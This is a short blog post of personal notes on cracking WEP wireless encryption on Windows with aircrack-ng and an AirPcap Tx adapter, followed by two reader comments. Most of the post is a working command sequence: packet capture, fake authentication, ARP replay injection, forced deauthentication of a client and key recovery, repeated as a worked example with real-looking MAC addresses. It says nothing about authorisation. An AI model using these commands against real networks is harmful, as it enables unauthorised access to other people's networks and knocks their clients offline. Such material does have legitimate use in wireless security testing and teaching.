Notes: Cracking WEP on the Windows command line with Aircrack-ng and AirPcap Tx
Finally, I’ve had time to write down my notes on using aircrack-ng with the Airpcap Tx adapter in Windows. Before you read on, please be aware that this isn’t meant to be a guide or tutorial, it’s just my notes. Thanky 
Basics
Start capturing:
airodump-ng \\.\airpcap00 airpcap CHANNELNUMBER mycapturefile
Fake auth:
aireplay-ng --fakeauth 0 -e "MYSSID" -a BSSIDMAC -h AIRPCAPMAC \\.\airpcap00
Start attack:
aireplay-ng --arpreplay -b BSSIDMAC -h CLIENTMAC \\.\airpcap00
Deauth (if we need ARPs):
aireplay-ng --deauth 3 -a BSSIDMAC -c CLIENTMAC \\.\airpcap00
Start cracking:
aircrack-ng -z mycapturefile.cap
Worked example:
airodump-ng.exe \\.\airpcap00 airpcap 11 mycapturefile
aireplay-ng --fakeauth 0 -e "WEP" -a 00:a0:c5:9d:d5:50 -h 00:02:72:67:92:8a \\.\airpcap00
aireplay-ng --arpreplay -b 00:a0:c5:9d:d5:50 -h 00:90:4b:eb:9b:36 \\.\airpcap00
aireplay-ng --deauth 3 -a 00:a0:c5:9d:d5:50 -c 00:90:4b:eb:9b:36 \\.\airpcap00
aircrack-ng -z mycapturefile.capDownload
I’ve prepared a special release of the aircrack-ng tools originally prepared by CACE Technologies on the AirPcap CDROM. It replaces the new aireplay-ng.exe with an older one which, in my tests, appears to perform better.
Download the release of aircrack-ng for AirPcap Tx
Vic said,
19 January, 2008 at 3:08 pm
how do I find the Mac-address of the Airpcap TX usb adapter? It doesn’t show in ipconfig…
Phil Wiffen said,
21 January, 2008 at 10:38 pm
Vic: it’s written on the adapter itself. Usually where the sticky label is
It doesn’t show up in ipconfig because, technically, it’s not a “real” Windows network adapter.